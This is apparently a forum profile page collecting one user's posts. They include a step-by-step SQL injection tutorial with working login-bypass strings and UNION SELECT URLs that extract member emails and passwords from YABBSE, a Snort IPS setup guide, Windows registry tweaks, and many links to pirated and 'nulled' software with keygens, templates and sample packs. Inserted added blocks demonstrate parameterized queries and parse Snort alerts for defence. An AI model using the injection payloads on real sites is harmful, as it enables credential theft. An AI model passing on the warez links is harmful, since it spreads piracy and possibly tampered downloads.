
zbeng

Active Members
  • Posts: 2402
  • Joined
  • Last visited
  • Days Won: 3

Everything posted by zbeng

  1. I. Manipulating login.php Script

     [01] Open the terminal and type (without prepending prompt symbols):

         $ su -
         # sql_tutorial_start

     These commands will start all needed services in the background.

     [02] Open the browser and check http://localhost/phpmyadmin/.

     [03] Have a look at the database userdb that our login.php script is accessing.

     [04] Have a look at the login.php script. To do this, open another terminal and type:

         $ vi login.php

     or, in case you are not familiar with the vi text editor, you can use the more user-friendly mcedit (or any other editor you wish):

         $ mcedit login.php

     [05] If you want to see the submitted query to get more information, delete the prepending slashes in the echo "$query " line.

     [06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below: (screenshot SQL_tutorial_02)

     [07] Enter the username admin, which we know exists. As you can see, we cannot log in due to the missing password.

     [08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

     [09] Enter admin' OR 1=1 as username and see what happens.

     [10] From the query we can see that we have a closing single quote that isn't opened.

     [11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in.

     [12] To advance the attack you might want to check out the /* to comment out all that follows. Enter admin' /* as username and check the query:

         SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''

     is what we entered, but only the part before /* is processed by the database. This is why the statement is valid.

     II. UNION SELECT

     [01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.

     [02] Open the script in the console by typing:

         $ vi /yabbse/SSI.php

     or use whichever editor you want. Now move to line 222, where the query we are trying to manipulate is located.

     [03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?function=recentTopics.

     [04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to an SQL injection attack.

     [05] From the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.

     [06] Go to:

         http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*

     From the error message we can see that the inserted SELECT statement doesn't have an equal number of queries. We have to add something to make it equal then.

     [07] Move your browser to:

         http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*

     Now we seem to have a valid query, but can only see the e-mail address.

     [08] Have a look at line 223 and below. There is an HTML parser to be found that shows the result of our query. So what we have to do now is mix around our null statements.

     [09] Move to:

         http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd, null, null, null, null, null, null FROM yabbse_members /*

     There we are - we have managed to obtain all the information we wanted.

     [10] Return to the terminal opened at the beginning (or open a new one) and issue the commands:

         $ su -
         # sql_tutorial_stop

     This will stop all services needed to pass through this tutorial.
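The following is an added example, not part of zbeng's post and not the tutorial's own login.php: it rebuilds the login query from part I against a constructed in-memory SQLite table (table name and rows are made up here) so the outcomes the steps describe can be checked offline, and puts the parameterized form of the same query next to it. Because the original PHP is not on the page, the string-concatenated query is an assumption of how login.php builds it, and the step [11] input is assumed to be `admin' OR 1='1` (the spacing in the post looks like a typo). SQLite, like MySQL, treats an unterminated `/*` as a comment running to the end of the statement, which is what step [12] relies on.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the tutorial's userdb/userlist table (SQLite in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userlist (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO userlist VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation (assumed to mirror the tutorial's login.php).

    Returns True/False for a row match, or None when the database rejected the SQL,
    which is the 'script generates an error' signal the tutorial probes for in step [08].
    """
    query = ("SELECT * FROM userlist WHERE username = '%s' AND password = '%s'"
             % (username, password))
    try:
        return len(conn.execute(query).fetchall()) > 0
    except sqlite3.Error:
        return None


def login_parameterized(conn, username, password):
    """Hardened form: bound parameters keep the input as data, never as SQL text."""
    query = "SELECT * FROM userlist WHERE username = ? AND password = ?"
    return len(conn.execute(query, (username, password)).fetchall()) > 0


def demo():
    """Run the tutorial's usernames (empty password) through both versions.

    Returns {username: (vulnerable_result, parameterized_result)}.
    """
    conn = make_db()
    usernames = [
        "admin",           # step [07]: real user, no password -> no match
        "admin'",          # step [08]: stray quote -> SQL error
        "admin' OR 1=1",   # step [09]: closing quote left dangling -> SQL error
        "admin' OR 1='1",  # step [11]: quotes balanced -> check bypassed
        "admin' /*",       # step [12]: rest of the statement commented out
    ]
    return {u: (login_vulnerable(conn, u, ""), login_parameterized(conn, u, ""))
            for u in usernames}


if __name__ == "__main__":
    for username, (vuln, safe) in demo().items():
        print("%-16r vulnerable=%-5s parameterized=%s" % (username, vuln, safe))
```

The parameterized column reads False for every injected username, which is the point: with placeholders the quote and comment characters never reach the SQL parser. The `None` results are the observable side channel the tutorial uses to decide the script is injectable, so in production the error should be logged server-side and not echoed back to the browser.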
  2. The tutorial deals with the installation, configuration and maintenance of an IPS system based on Snort.

     Testing Environment

     The testing environment used in this tutorial has been composed of the following software:
     1. hakin9 live 2.8-ng
     2. a computer equipped with three network interface cards: eth0, eth1, eth2

     Purpose

     After completing the exercises below, the user will have gained knowledge regarding the configuration and maintenance of an IPS system based on the Snort program.

     Step 1. Configuring the network bridge

     We are building a network bridge which will be used as an IPS system. We assign interfaces eth0 and eth1 to the br0 interface, which is our bridge, and configure eth2, which will administrate the entire machine. For that purpose we use the makeBridge.sh and eth2Config.sh shell scripts.

     Step 2. Configuring Snort

     The only step which we have to take is the modification of the Snort configuration file /etc/snort/snort.conf. We don't have any attack signatures, so we turn all lines of the form

         include $RULE_PATH/*.rules

     into comment lines (by adding a # at the beginning of each line). The lines can be found at the end of the configuration file. We also change the line:

         var RULE_PATH ../rules

     into

         var RULE_PATH /etc/snort/rules

     and add:

         config layer2resets

     We then create our own rules by adding appropriate lines to the /etc/snort/rules/test.rules file. Now all we have to do is let Snort know about our rules file; in the /etc/snort/snort.conf file, we create the line:

         include $RULE_PATH/test.rules

     That's it!

     Step 3. Configuring iptables

     We will configure iptables in a way which will force all received packets to go through the Snort system. We do this with the iptabConfig.sh shell script. We can also modify the script in a way which would make Snort go after only those packets which have been addressed to WWW servers: iptabConfigWWW.sh

     Step 4. Testing the IPS

     Once we have Snort installed and all rules configured as described above, we can start testing our settings. If a packet is sent from the network to port 22 on our computer, the system will register the following message in its logs:

         [**] [1:0:0] Port 22 Connection Initiated [**]
         [Classification: Attempted User Privilege Gain] [Priority: 1]
         09/19-20:19:07.436667 192.168.0.2:1049 -> 193.219.28.2:22
         TCP TTL:128 TOS:0x0 ID:702 IpLen:20 DgmLen:48 DF
         ******S* Seq: 0x29821EB9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
         TCP Options (4) => MSS: 1460 NOP NOP SackOK

     An Echo Request will result in the following:

         [**] [1:0:0] ICMP Echo Request [**]
         [Classification: Attempted User Privilege Gain] [Priority: 1]
         09/19-20:12:57.194560 192.168.0.2 -> 212.76.32.1
         ICMP TTL:128 TOS:0x0 ID:420 IpLen:20 DgmLen:60
         Type:8 Code:0 ID:512 Seq:256 ECHO

     If Snort finds a packet corresponding to the third rule, the result will be as follows:

         [**] [1:0:0] DNS Request [**]
         [Classification: Attempted User Privilege Gain] [Priority: 1]
         09/19-20:21:12.989775 192.168.0.2:1041 -> 212.76.39.45:53
         UDP TTL:128 TOS:0x0 ID:818 IpLen:20 DgmLen:59
         Len: 31

     Step 5. Installing official rules

     The first task one has to do is to obtain current rules from the Snort homepage. They are available at http://www.snort.org/rules/. The downloaded archive should be uncompressed into the /etc/snort/ directory. The default action undertaken by Snort for all rules is the registering of an attack (the alert directive). Since we are going to block attacks, we must modify all rules appropriately by changing the alert action to drop. We can accomplish this by using the chRules.sh shell script. The last thing which we need to do before restarting Snort is yet another modification of the /etc/snort/snort.conf file (we must uncomment the corresponding lines to which we previously added the # sign). If all went well, the time has come to start our system:

         # snort -Q -D -c /etc/snort/snort.conf -l /var/log/snort

     Step 6. Automatic Updates of the Snort System

     The first thing is the installation of the Oinkmaster program:

         $ tar zxvf oinkmaster-1.2.tar.gz
         $ cd oinkmaster-1.2
         # cp oinkmaster.pl /usr/local/bin/
         # cp oinkmaster.conf /etc/

     Now we must configure the program. We will need the code generated for rules meant for registered users. We register at the Snort homepage and generate the appropriate code. We choose which rules we want to update by editing the oinkmaster.conf file. We uncomment the line:

         # url = http://www.snort.org/pub-bin/oinkmaster.cgi/oinkcode/snortrules-snapshot-CURRENT.tar.gz

     by removing the # sign at its beginning and replace oinkcode with the code generated for us by the script on the Snort homepage. There is still one more oinkmaster.conf modification to make. We add the line:

         modifysid * "^alert" | "drop"

     Due to this last modification the default action for all updated rules will be to drop all suspicious packets rather than inform about them. Now all we have to do is start the program by:

         oinkmaster.pl -o /etc/snort/rules/
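The following is an added example, not part of zbeng's post and not code from the hakin9 tutorial or the Snort project: a small parser for the "full" alert layout that Step 4 shows, so the three test alerts can be turned into structured records for review. The sample text is constructed from the three alerts in the post (blank-line separated, as Snort writes them to its alert file); the field names in the returned dicts are this example's own choice. The `unrevised_rules` check flags alerts whose `[gid:sid:rev]` is `1:0:0`, which is what Snort prints for a local rule that carries no `sid`/`rev` options, a detail worth fixing in test.rules before the official rule set (which relies on sids for updates via Oinkmaster) is merged in.

```python
import re
from collections import Counter

# Constructed sample: the three alerts the tutorial's test rules produce, in
# Snort's "full" alert layout with one blank line between alerts.
SAMPLE_ALERTS = """\
[**] [1:0:0] Port 22 Connection Initiated [**]
[Classification: Attempted User Privilege Gain] [Priority: 1]
09/19-20:19:07.436667 192.168.0.2:1049 -> 193.219.28.2:22
TCP TTL:128 TOS:0x0 ID:702 IpLen:20 DgmLen:48 DF
******S* Seq: 0x29821EB9  Ack: 0x0  Win: 0xFAF0  TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK

[**] [1:0:0] ICMP Echo Request [**]
[Classification: Attempted User Privilege Gain] [Priority: 1]
09/19-20:12:57.194560 192.168.0.2 -> 212.76.32.1
ICMP TTL:128 TOS:0x0 ID:420 IpLen:20 DgmLen:60
Type:8  Code:0  ID:512   Seq:256  ECHO

[**] [1:0:0] DNS Request [**]
[Classification: Attempted User Privilege Gain] [Priority: 1]
09/19-20:21:12.989775 192.168.0.2:1041 -> 212.76.39.45:53
UDP TTL:128 TOS:0x0 ID:818 IpLen:20 DgmLen:59
Len: 31
"""

# "[**] [gid:sid:rev] message [**]"
HEADER_RE = re.compile(r"\[\*\*\]\s+\[(\d+):(\d+):(\d+)\]\s+(.+?)\s+\[\*\*\]")
# "[Classification: ...] [Priority: N]" (absent when the rule has no classtype)
CLASS_RE = re.compile(r"\[Classification:\s*(.+?)\]\s+\[Priority:\s*(\d+)\]")
# timestamp, src[:port] -> dst[:port], then the IP header summary line;
# ports are optional because ICMP alerts have none
PACKET_RE = re.compile(
    r"(\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?\s+->\s+"
    r"(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?\s+"
    r"(TCP|UDP|ICMP)\s+TTL:(\d+)\s+TOS:0x([0-9A-Fa-f]+)\s+ID:(\d+)\s+"
    r"IpLen:(\d+)\s+DgmLen:(\d+)"
)


def parse_alerts(text):
    """Turn Snort full-format alert text into a list of dicts, one per alert."""
    records = []
    # Split at every line that starts a new alert header.
    for block in re.split(r"(?m)^(?=\[\*\*\]\s+\[\d+:\d+:\d+\])", text):
        if not block.strip():
            continue
        head = HEADER_RE.search(block)
        cls = CLASS_RE.search(block)
        pkt = PACKET_RE.search(block)
        if not (head and pkt):
            continue  # truncated or unknown layout: skip rather than guess
        records.append({
            "gid": int(head.group(1)),
            "sid": int(head.group(2)),
            "rev": int(head.group(3)),
            "msg": head.group(4),
            "classification": cls.group(1) if cls else None,
            "priority": int(cls.group(2)) if cls else None,
            "timestamp": pkt.group(1),
            "src": pkt.group(2),
            "sport": int(pkt.group(3)) if pkt.group(3) else None,
            "dst": pkt.group(4),
            "dport": int(pkt.group(5)) if pkt.group(5) else None,
            "proto": pkt.group(6),
            "ttl": int(pkt.group(7)),
            "dgmlen": int(pkt.group(11)),
        })
    return records


def count_by_protocol(records):
    """How many alerts fired per transport protocol."""
    return dict(Counter(r["proto"] for r in records))


def unrevised_rules(records):
    """Messages of alerts whose rule reports sid 0 / rev 0, i.e. local rules
    written without sid/rev options; sorted so the result is stable."""
    return sorted({r["msg"] for r in records if r["sid"] == 0 and r["rev"] == 0})


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    for a in alerts:
        print("%s %s %s -> %s:%s  %s" % (a["timestamp"], a["proto"], a["src"],
                                          a["dst"], a["dport"], a["msg"]))
    print("by protocol:", count_by_protocol(alerts))
    print("rules without sid/rev:", unrevised_rules(alerts))
```

Point the script at the real /var/log/snort/alert file by reading it into `parse_alerts`; alerts in the older "fast" one-line format are skipped because `PACKET_RE` needs the IP header line, so switch Snort to full alerts (or extend the regex) before relying on the counts.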
  3. http://share.urbanfriends.us/savefile_php/uploads/fa8de5b020.rar
     http://rapidshare.com/files/3327891/93_vbulletin.new.rar.html
  4. zbeng

    TM 10813

    Item number: 10813 Type: FLASH SITE Author: Cowboy Downloads: 4 SOURCES AVAILABLE: .PSD; .HTML; .FLA; .SWF; SOFTWARE REQUIRED: Adobe Photoshop 7+; Macromedia Dreamweaver, Adobe GoLive or Microsoft Frontpage 2003; Macromedia Flash MX+; http://rapidshare.com/files/2227114/10813.www.ewares.org.rar.html
  5. 390 high-quality BMW pictures DOWNLOAD
     http://rapidshare.com/files/3309855/bmw_collection.part01.rar.html
     http://rapidshare.com/files/3309854/bmw_collection.part02.rar.html
     http://rapidshare.com/files/3309853/bmw_collection.part03.rar.html
     http://rapidshare.com/files/3309852/bmw_collection.part04.rar.html
     http://rapidshare.com/files/3308848/bmw_collection.part05.rar.html
     http://rapidshare.com/files/3308608/bmw_collection.part06.rar.html
     http://rapidshare.com/files/3308354/bmw_collection.part07.rar.html
     http://rapidshare.com/files/3308081/bmw_collection.part08.rar.html
     http://rapidshare.com/files/3307850/bmw_collection.part09.rar.html
     http://rapidshare.com/files/3307587/bmw_collection.part10.rar.html
     http://rapidshare.com/files/3307371/bmw_collection.part11.rar.html
     http://rapidshare.com/files/3307098/bmw_collection.part12.rar.html
     http://rapidshare.com/files/3306778/bmw_collection.part13.rar.html
     http://rapidshare.com/files/3306407/bmw_collection.part14.rar.html
     http://rapidshare.com/files/3305976/bmw_collection.part15.rar.html
     http://rapidshare.com/files/3305660/bmw_collection.part16.rar.html
     http://rapidshare.com/files/3305325/bmw_collection.part17.rar.html
     http://rapidshare.com/files/3305029/bmw_collection.part18.rar.html
  6. zbeng

    9485 full

    http://rapidshare.com/files/3304069/tm_9485.rar.html
  7. Beautifully designed flash clocks. Must have for web site developers... Link: http://rapidshare.com/files/3308366/129_Flash_Clocks_SpyJoe.rar Password: SpyJoe Size: 1.9
  8. It will soon be posted here too, wait... don't die for 3-4 days ;)
  9. http://www.i-file.org/?d=BA67B2D6 http://rapidshare.com/files/3218617/ebony.zip.html
  10. Blogsystem.v1.4.PHP.NULL-DGT
      cpengine.v1.3.PHP.NULL-DGT
      Geek.Article.and.Review.System.v2.0.1.PHP.NULL-DGT
      ImpEx.1.115(b1.70).PHP.NULL-DGT
      Koobi.Pro.v5.8.PHP.NULL-DGT
      MyWebFTP.Pro.v5.3.1.PHP.NULL-DGT
      PhotoPost.vBGallery.v1.1.PHP.NULL-DGT
      PhotoPost.vBGallery.v2.1.PHP.NULL-DGT
      vBulletin.v2.3.11.PHP.NULL-DGT
      vBulletin.v3.0.16.incl.KeyGen.PHP.NULL-DGT
      vBulletin.v3.0.16.PHP.NULL-DGT
      vBulletin.v3.5.6.incl.KeyGen.PHP.NULL-DGT
      vBulletin.v3.5.6.PHP.NULL-DGT
      vBulletin.v3.6.3.incl.KeyGen.PHP.NULL-DGT
      vBulletin.v3.6.3.PHP.NULL-DGT
      DOWNLOAD http://rapidshare.com/users/N22XRD
  11. The timeless art of handwriting Over 50 Fonts in True and Open type Download: http://rapidshare.com/files/3175024/niF.rar
  12. Over 680+ megabytes of 16 bit, 44 kHz .Wav sample loops ready for use in Acid Pro or any other software/machine that supports it. CD is called Urban Joints Pro; I've lost the original casing, so if you wanna know who it's produced by I'll have to get back to ya on that one. Samples are organized not by BPM but by the type of loop, such as:
      - Basses
      - Chords & Keys
      - Drums
      - Effects
      - Hits & Stabs
      - Instruments
      - Loops
      - Synths & Pads
      - Vocals
      Enjoy everyone.
      download:
      http://rapidshare.de/files/19332161/Urban_Joints_Pro.part1.rar.html
      http://rapidshare.de/files/19333163/Urban_Joints_Pro.part2.rar.html
      http://rapidshare.de/files/19334218/Urban_Joints_Pro.part3.rar.html
      http://rapidshare.de/files/19335339/Urban_Joints_Pro.part4.rar.html
      http://rapidshare.de/files/19336237/Urban_Joints_Pro.part5.rar.html

      CB Productions' David Burell (R. Kelly, Whitney Houston, Mariah Carey) brings you deep inside the hip-hop chart zone, delivering tracks that'll keep bumpin' and jumpin'. da Joints loops will help your tunes turn the heads of even the most jaded A&R rep. Basses, beats, keys, licks, guitars, fx, and more are all there in a construction kit format, delivering everything you need to bust out of the studio and onto the charts. Top Features:
      - Acidized WAV - professionally recorded and meticulously edited
      Download:
      http://rapidshare.de/files/19337489/Da_Jointz.part1.rar.html
      http://rapidshare.de/files/19338822/Da_Jointz.part2.rar.html
      http://rapidshare.de/files/19339265/Da_Jointz.part3.rar.html
  13. Demo: http://www.boxedart.com/phpshop/info.php/mp_/17170
      Download: http://www.megaphile.com/file/49/TGraphxEvil.zip.html
      Demo: http://www.boxedart.com/phpshop/info.php/mp_/16397
      Download: http://www.megaphile.com/file/50/FFLegendaryGamers.zip.html
      Demo: http://www.boxedart.com/phpshop/info.php/mp_/16321
      Download: http://www.megaphile.com/file/51/FTLastLevel.zip.html
  14. Logon Screen Windows XP Pirated Edition Download: http://wallpapers-n-etc.com/download.php?view.862 You have to sign-up to download.
  15. It works ;) now I'll make you one on .de
  16. To me these look like 2 really nice templates ;)
      Download: http://rapidshare.com/files/686140/an_silver_griffin.uha
      Download: http://rapidshare.com/files/687744/an_robotics.uha
      Pass: enem
  17. Html, font, psd (some sliced) 95 MB http://rapidshare.com/files/2941115/73_Liquid_T.rar.html
  18. http://rapidshare.com/files/2897422/ROUNDer.rar.html
  19. StockLayout Brochure Template 2 Page : Internet Service Company
      Full template: 3 EPS, 3 Jpeg, 5 Pdf, 1 Indd
      Page size: 8.5x11
      Fold type: Tri Fold
      Size: 4.2 MB
      Download: http://rapidshare.com/files/2806325/bro1.rar
  20. zbeng

    TM 10039

    TM 10039 http://rapidshare.com/files/2827913/100enem39.uha
  21. Xmas Cards Vol. 2 10.1 Mb | 10 JPG | RAR | Hi-Res | 1600 x 1000 pixels Download: http://rapidshare.com/files/2760654/xmascards2_edi67_.rar
  22. #1
      //----------------------------------------------------------------------------
      // Change max IE connections to 50, if you have high-speed Internet it
      // speeds things up a little more
      // Works Cited: http://weblogs.asp.net/dwanta/archive/2004/03/31/105050.aspx
      //----------------------------------------------------------------------------

      [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
      "MaxConnectionsPerServer"=dword:00000032
      "MaxConnectionsPer1_0Server"=dword:00000032

      //--------------------------------------------------------------------------------//

      #2
      //----------------------------------------------------------------------------
      // Change the Start Button Text
      // find pictures in folder /startButtonPics/
      // Works Cited: http://www.winguides.com/registry/display.php/791/
      //----------------------------------------------------------------------------

      Manually changing the Start button requires the use of a binary file editor (or hex editor) to alter a critical Windows system file; it is therefore not recommended for inexperienced users. This method has been successfully tested on Windows 95, 98, ME, 2000 and XP and therefore should be quite safe, although we do not accept any responsibility for system problems or data loss. As mentioned before, you will need to have a hex editor installed; there are many different products available, and if you don't have one already a quick search of a shareware site should provide many choices. For this tweak we only require basic features.

      1. The file that needs to be changed is Windows Explorer, and it is essential to make a backup before you modify anything. "Explorer.exe" can be found in the Windows directory, usually C:\WINDOWS for Windows 95, 98, Me & XP and C:\WINNT for Windows NT/2000. Make a copy of "Explorer.exe" and place it into another directory; C:\BACKUP might be a good choice.

      2. Make another copy of the original "Explorer.exe" and name it "Explorer1.exe", then open "Explorer1.exe" in your hex editor.

      3. You now need to find the word "Start". Although there are many entries for "Start" in the file, only one is used to label the Start button. Use the search function in the hex editor to find all the strings equal to "S t a r t", which is represented as "53 00 74 00 61 00 72 00 74" in hex values. As there are many different "Start" strings, keep searching until you find one located just before this text: "There was an internal error and one of the windows you were using has been closed.". Below is a list of offsets to help you locate the correct text.
         * Windows 98 Offset: 0x00028D6E - 0x00028D76
         * Windows NT4 Offset: 0x00028BEE - 0x00028BF6
         * Windows ME Offset: 0x00033DDE - 0x00033DE6
         * Windows 2000 Offset: 0x0003860E - 0x00038616
         * Windows XP (Enhanced Start Menu) Offset: 0x000412B6 - 0x000412BE
         * Windows XP (Classic Start Menu) Offset: 0x0004158A - 0x00041592
         * Windows XP SP1 (Enhanced Start Menu) Offset: 0x0004208E - 0x00042096
         * Windows XP SP1 (Classic Start Menu) Offset: 0x0004259A - 0x000425A2

      4. Once you have located the string, you can then replace the letters in "Start" with five other characters. You must use exactly five characters; if the word you want to use is shorter, replace the remaining characters with the space key. In this example we have replaced "Start" with "Guide"; alternatively a three-letter word would look like "A B C" (note the spaces).

      5. Now save the modified "Explorer1.exe" in the Windows directory, and confirm that you now have the two Explorer files in the Windows directory. They both should be the same file size but have different modified dates.

      6. The next step is different depending on your operating system. Only do the step required for your version.
         * Windows 95, 98 & ME: Exit to DOS (or use a boot disk for Windows ME) and at the command prompt change to the Windows directory and rename "explorer.exe" to "explorer.old". Then copy the newly modified Explorer "explorer1.exe" to "explorer.exe". Do a directory listing and confirm that "explorer.exe" has the most recent modified date and time. Restart the computer and Windows should reload along with the new Start button text.
         * Windows NT: First close any open applications and open a new Command Prompt window, then switch back to the GUI and open the Task Manager. Find the "explorer.exe" process and end it; you should now be left with only the command prompt and task manager. Switch back to the command prompt and change to the Windows directory, rename "explorer.exe" to "explorer.old", and copy the newly modified Explorer "explorer1.exe" to "explorer.exe". Do a directory listing and confirm that "explorer.exe" has the most recent modified date and time. Switch back to Task Manager and launch a "New Task" called "explorer.exe"; this should reload the shell along with your modified "Start" button.
         * Windows 2000 and XP: Open your registry editor and find the key [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]. Find the value named "Shell" and change it to equal the filename of the new explorer, "explorer1.exe". Exit your registry editor and restart Windows for the change to take effect. To reverse the change, modify the value of "Shell" and set it back to "explorer.exe".

           Name        Type     Data
           (Default)   REG_SZ   (value not set)
           Shell       REG_SZ   explorer1.exe
           (key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon)

      7. If everything has gone successfully you will now have a new Start button, and also hopefully have learnt something about the Explorer file structure. If you do have problems, replace the faulty Explorer with the backup made during the first step.

      //----------------------------------------------------------------------------------//

      #3
      //---------------------------------------------------------------
      // Display a banner each time Windows boots
      //---------------------------------------------------------------
      1. Start -> Run
      2. Type regedit
      3. Go to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
      4. Create a new string value in the right pane named LegalNoticeCaption and enter the value that you want to see in the menubar
      5. Create a new string value and name it LegalNoticeText. Modify it and insert the message you want to display each time Windows boots

      //---------------------------------------------------------------------------------//

      #4
      //---------------------------------------------------------------
      // Shutting down Windows the fastest way
      //---------------------------------------------------------------
      1. Start -> Run
      2. Type rundll.exe user.exe,exitwindows

      //----------------------------------------------------------------------------------//

      #5
      //-----------------------------------------------------------------
      // registry hack which will allow you to see your opponents' cards
      //-----------------------------------------------------------------
      Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts. NOTE: You may have to create the Hearts key under Applets. In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.